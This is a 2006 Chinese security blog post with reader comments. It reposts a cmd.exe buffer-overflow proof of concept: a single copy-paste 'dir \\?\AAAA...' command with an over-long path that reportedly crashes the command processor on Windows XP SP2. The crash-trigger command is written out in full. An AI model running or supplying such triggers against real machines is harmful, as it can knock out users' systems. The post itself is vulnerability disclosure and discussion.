真正的dir溢出

2006/10/20 11:14 | 鬼仔 | 技术文章 | 占个座先

刚在CN.Tink那里看到的，哈哈，挺好玩的！
我试了下，截图如下：

Windows Command Processor CMD.EXE Buffer Overflow

Execute the following line in cmd.exe (copy-paste)..
tested on winxp sp2 (fully patched) on 2006/10/06/17.56

(it is a single command, has been split into multiple lines for readability sake).
%COMSPEC% /K "dir \\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
直接输入dir \\?\AAA(超过260个A)也会引发错误
来自国外一个站，原文：http://www.infogreg.com/security/misc/windows-command-processor-cmd.exe-buffer-overflow.html

Tags: dir, 溢出

上一篇:Internet Explorer 7:24小时内的第一个漏洞 + 微软作的正面回应

下一篇:动易2006 SP4版最新漏洞公告

楼被抢了 6 层了... 抢座、Rss 2.0或者 Trackback

但丁 | 2006-10-21 07:05 | #

没打补丁看的见这个效果！我的电脑看不到！

回复该留言
wszf | 2006-10-21 09:36 | #

我靠。。。铞。。。 :!:

回复该留言
xi4oyu | 2006-10-25 10:46 | #

貌似\\?\就是告诉shell放弃文件名检查。。。。

回复该留言
鬼仔 | 2006-10-27 06:23 | #

直接输入dir \\?\AAA(超过260个A)也会引发错误

回复该留言
fly | 2007-04-03 09:32 | #

那这个DIR溢出有补丁吗?
是哪个呀?微软上面找不到呀… :cry:

回复该留言
鬼仔 | 2007-04-03 10:04 | #

好像没有。

回复该留言

鬼仔's Blog